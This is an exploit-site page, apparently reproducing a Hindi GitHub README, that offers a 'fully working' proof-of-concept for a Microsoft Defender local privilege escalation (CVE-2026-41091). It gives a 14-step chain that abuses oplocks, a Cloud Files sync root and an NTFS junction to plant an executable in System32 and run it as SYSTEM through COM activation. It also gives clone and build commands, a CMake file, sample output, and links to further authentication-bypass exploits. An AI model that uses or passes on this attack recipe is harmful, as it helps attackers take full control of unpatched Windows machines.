Sploitus

CVE-2026-41091-PoC-Exploit

kitploit · 2026-08-26

Exploit Code

MARKDOWN259 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TC4DY-CVE-2026-41091-POC-EXPLOIT
![SolarFlare](https://assets.kitploit.com/production/public/readmes/33284/ffc33f872422b26beb6a58728702cf01cf636423fce5ab60fd0eeeb9475c5008.png)

# ☀️ CVE-2026-41091 - RedSun (SolarFlare) - Microsoft Defender LPE शोषण

![C++](https://img.shields.io/badge/C++-17+-blue.svg) ![Windows](https://img.shields.io/badge/Windows-10+-0078D6.svg) ![License](https://img.shields.io/badge/License-MIT-green.svg) ![CVSS](https://img.shields.io/badge/CVSS-7.8%20High-orange.svg) ![CISA KEV](https://img.shields.io/badge/CISA-KEV-red.svg)

> **Microsoft Defender लिंक अनुसरण भेद्यता** \- NT AUTHORITY\SYSTEM के लिए स्थानीय विशेषाधिकार वृद्धि

## यह भेद्यता "RedSun" 🎯 के रूप में जानी जाती है, "SolarFlare" मेरे शोषण का नाम है। ✅

## 📌 अवलोकन

इस रिपॉजिटरी में **CVE-2026-41091** के लिए एक **पूर्ण कार्यशील प्रूफ ऑफ कॉन्सेप्ट (PoC) शोषण** शामिल है, जो Microsoft Defender (Microsoft Malware Protection Engine) में एक गंभीर स्थानीय विशेषाधिकार वृद्धि भेद्यता है। अनुचित लिंक रिज़ॉल्यूशन (CWE-59) का शोषण करके, एक प्रमाणित निम्न-विशेषाधिकार वाला हमलावर **NT AUTHORITY\SYSTEM** विशेषाधिकार प्राप्त कर सकता है।

यह भेद्यता, जिसे **"RedSun"** या **"SolarFlare"** के नाम से भी जाना जाता है, हमलावरों को Cloud Files API (CfAPI) और NTFS जंक्शन पॉइंट्स का उपयोग करके Microsoft Defender को संरक्षित सिस्टम स्थानों पर SYSTEM विशेषाधिकारों के साथ मनमानी फ़ाइलें लिखने के लिए धोखा देने की अनुमति देती है।

> **नोट:** इस रिपॉजिटरी में दो संस्करण शामिल हैं:
> 
>   * `basic_poc.cpp` \- सरलीकृत एल्गोरिदम प्रदर्शन (शैक्षिक)
>   * `full_poc.cpp` \- सभी सुविधाओं के साथ पूर्ण कार्यशील शोषण
> 


### 🔥 मुख्य विशेषताएं

## 🎯 भेद्यता विवरण

### 📦 प्रभावित उत्पाद

उत्पाद| प्रभावित संस्करण| फिक्स्ड संस्करण  
---|---|---  
Microsoft Malware Protection Engine| < 1.1.26040.8| 1.1.26040.8+  
Microsoft Defender एंटीमैलवेयर प्लेटफॉर्म| < 4.18.26040.7| 4.18.26040.7+  
  
## 🔬 शोषण श्रृंखला

root@kitploit:~
    
    
    ┌─────────────────────────────────────────────────────────────────────────────┐
    │ SOLARFLARE शोषण श्रृंखला                                                    │
    ├─────────────────────────────────────────────────────────────────────────────┤
    │                                                                              │
    │ 1. कार्यशील निर्देशिका बनाएं                                                 │
    │    └─> %TEMP%\SF-XXXX\                                                      │
    │                                                                              │
    │ 2. EICAR के साथ डिफेंडर को ट्रिगर करें                                       │
    │    └─> बाइट फ़ाइल में उल्टा EICAR लिखें                                     │
    │                                                                              │
    │ 3. VSS स्नैपशॉट की प्रतीक्षा करें                                            │
    │    └─> वॉल्यूम शैडो कॉपी निर्माण का पता लगाएं                               │
    │                                                                              │
    │ 4. पहला बैच Oplock बनाएं                                                    │
    │    └─> बाइट फ़ाइल पर FSCTL_REQUEST_BATCH_OPLOCK                             │
    │                                                                              │
    │ 5. Oplock ब्रेक की प्रतीक्षा करें                                            │
    │    └─> अनन्य पहुंच प्राप्त करें                                             │
    │                                                                              │
    │ 6. निर्देशिका का नाम बदलें                                                   │
    │    └─> मूल निर्देशिका को .tmp पर ले जाएं                                     │
    │                                                                              │
    │ 7. क्लाउड सिंक रूट पंजीकृत करें                                              │
    │    └─> Cloud Files API के साथ CfRegisterSyncRoot                             │
    │                                                                              │
    │ 8. क्लाउड प्लेसहोल्डर बनाएं                                                  │
    │    └─> बाइट फ़ाइल के लिए CfCreatePlaceholders                                │
    │                                                                              │
    │ 9. दूसरा बैच Oplock बनाएं                                                    │
    │    └─> क्लाउड प्लेसहोल्डर पर FSCTL_REQUEST_BATCH_OPLOCK                     │
    │                                                                              │
    │ 10. दूसरे Oplock ब्रेक की प्रतीक्षा करें                                      │
    │     └─> अनन्य पहुंच प्राप्त करें                                             │
    │                                                                              │
    │ 11. क्लाउड निर्देशिका का नाम बदलें                                           │
    │     └─> क्लाउड निर्देशिका को .cloud.tmp पर ले जाएं                           │
    │                                                                              │
    │ 12. System32 के लिए NTFS जंक्शन बनाएं                                        │
    │     └─> C:\Windows\System32 पर पुनर्निर्देशित करें                            │
    │                                                                              │
    │ 13. System32 में पेलोड कॉपी करें                                              │
    │     └─> बाइट फ़ाइल को TieringEngineService.exe के रूप में System32 में कॉपी करें  │
    │                                                                              │
    │ 14. SYSTEM के रूप में सेवा सक्रिय करें                                        │
    │     └─> CoCreateInstance(StorageTiersManagement)                            │
    │                                                                              │
    └─────────────────────────────────────────────────────────────────────────────┘
    

## 📦 स्थापना

### पूर्वापेक्षाएँ

  * Windows 10/11 या Windows Server 2019/2022
  * C++ टूल के साथ Visual Studio 2019/2022
  * प्रशासनिक विशेषाधिकार (निष्पादन के लिए)



### बिल्ड

root@kitploit:~
    
    
    # रिपॉजिटरी क्लोन करें
    git clone https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
    cd CVE-2026-41091-PoC-Exploit
    
    # Visual Studio डेवलपर कमांड प्रॉम्प्ट का उपयोग करके बिल्ड करें
    cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib
    
    # या बुनियादी संस्करण बनाएं
    cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib
    

## 🛠️ उपयोग

### पूर्ण शोषण (SYSTEM विशेषाधिकार वृद्धि)

root@kitploit:~
    
    
    full_poc.exe
    

### बुनियादी एल्गोरिदम प्रदर्शन

root@kitploit:~
    
    
    basic_poc.exe
    

## 📋 उदाहरण आउटपुट

### पूर्ण शोषण आउटपुट

root@kitploit:~
    
    
    CVE-2026-41091 SolarFlare PoC
    ===============================
         by @tc4dy | CVSS 7.8
    ===============================
    
    [*] SolarFlare शोषण शुरू हुआ।
    [*] कार्यशील निर्देशिका बनाई जा रही है...
    [+] निर्देशिका बनाई गई: C:\Users\user\AppData\Local\Temp\SF-8427\
    [*] EICAR के साथ डिफेंडर को ट्रिगर किया जा रहा है...
    [+] डिफेंडर ट्रिगर हुआ
    [*] VSS स्नैपशॉट की प्रतीक्षा की जा रही है...
    [+] VSS स्नैपशॉट का पता चला
    [*] पहला oplock बनाया जा रहा है...
    [+] पहला oplock बनाया गया
    [*] Oplock ब्रेक की प्रतीक्षा की जा रही है...
    [+] Oplock प्राप्त हुआ
    [*] निर्देशिका का नाम बदला जा रहा है...
    [+] निर्देशिका का नाम बदल दिया गया
    [*] दूसरा oplock बनाया जा रहा है...
    [+] दूसरा oplock बनाया गया
    [*] दूसरे oplock की प्रतीक्षा की जा रही है...
    [+] दूसरा oplock प्राप्त हुआ
    [*] क्लाउड निर्देशिका का नाम बदला जा रहा है...
    [+] क्लाउड निर्देशिका का नाम बदल दिया गया
    [*] System32 के लिए NTFS जंक्शन बनाया जा रहा है...
    [+] जंक्शन बनाया गया
    [*] डिफेंडर के समाप्त होने की प्रतीक्षा की जा रही है...
    [*] System32 में पेलोड कॉपी किया जा रहा है...
    [+] पेलोड C:\Windows\System32\TieringEngineService.exe में कॉपी किया गया
    [*] Storage Tiers Management सेवा सक्रिय की जा रही है...
    [+] सेवा SYSTEM के रूप में सक्रिय हुई
    
    [+] SYSTEM पहुंच प्राप्त हुई!
    

### बुनियादी PoC आउटपुट

root@kitploit:~
    
    
    CVE-2026-41091 Basic PoC
    ========================================
      एल्गोरिदम प्रदर्शन केवल
    ========================================
    [*] शोषण एल्गोरिदम शुरू किया जा रहा है...
    [*] कार्यशील निर्देशिका बनाई जा रही है...
    [+] निर्देशिका बनाई गई: C:\Users\user\AppData\Local\Temp\BE-3921\
    [*] EICAR के साथ डिफेंडर को ट्रिगर किया जा रहा है...
    [+] डिफेंडर ट्रिगर हुआ
    [*] VSS स्नैपशॉट की प्रतीक्षा की जा रही है...
    [+] VSS का पता चला
    [*] पहला oplock बनाया जा रहा है...
    [+] पहला oplock बनाया गया
    [*] Oplock ब्रेक की प्रतीक्षा की जा रही है...
    [+] Oplock प्राप्त हुआ
    [*] निर्देशिका का नाम बदला जा रहा है...
    [+] निर्देशिका का नाम बदल दिया गया
    [*] दूसरा oplock बनाया जा रहा है...
    [+] दूसरा oplock बनाया गया
    [*] दूसरे oplock की प्रतीक्षा की जा रही है...
    [+] दूसरा oplock प्राप्त हुआ
    [*] System32 के लिए NTFS जंक्शन बनाया जा रहा है...
    [+] जंक्शन बनाया गया
    [*] डिफेंडर के समाप्त होने की प्रतीक्षा की जा रही है...
    [*] System32 में पेलोड कॉपी किया जा रहा है...
    [+] पेलोड C:\Windows\System32\Payload.exe में कॉपी किया गया
    
    [+] एल्गोरिदम प्रदर्शन पूर्ण हुआ!
    [i] यह केवल बुनियादी एल्गोरिदम है।
    [i] पूर्ण SYSTEM विशेषाधिकार वृद्धि के लिए,
    [i] Cloud API और COM सक्रियण के साथ full_poc.cpp का उपयोग करें।
    

## 🔧 बिल्ड निर्देश

### Visual Studio का उपयोग करना

  1. VS 2022 के लिए डेवलपर कमांड प्रॉम्प्ट खोलें
  2. शोषण निर्देशिका पर जाएं
  3. चलाएँ:



root@kitploit:~
    
    
    # पूर्ण शोषण
    cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib
    
    # बुनियादी PoC
    cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib
    

### CMake का उपयोग करना

root@kitploit:~
    
    
    cmake_minimum_required(VERSION 3.10)
    project(SolarFlare)
    
    set(CMAKE_CXX_STANDARD 17)
    
    add_executable(full_poc full_poc.cpp)
    target_link_libraries(full_poc cfapi ntdll)
    
    add_executable(basic_poc basic_poc.cpp)
    target_link_libraries(basic_poc ntdll)
    

## ⚠️ आवश्यकताएँ और सीमाएँ

## 🔗 संबंधित शोषण

मेरे अन्य शोषण रिपॉजिटरी देखें:

  * CVE-2026-24061-PoC-Exploit \- GNU inetutils-telnetd प्रमाणीकरण बाईपास
  * CVE-2026-41940-PoC-Exploit \- cPanel/WHM प्रमाणीकरण बाईपास शोषण
  * CVE-2026-0073-PoC-Exploit \- Android ADB वायरलेस डिबगिंग प्रमाणीकरण बाईपास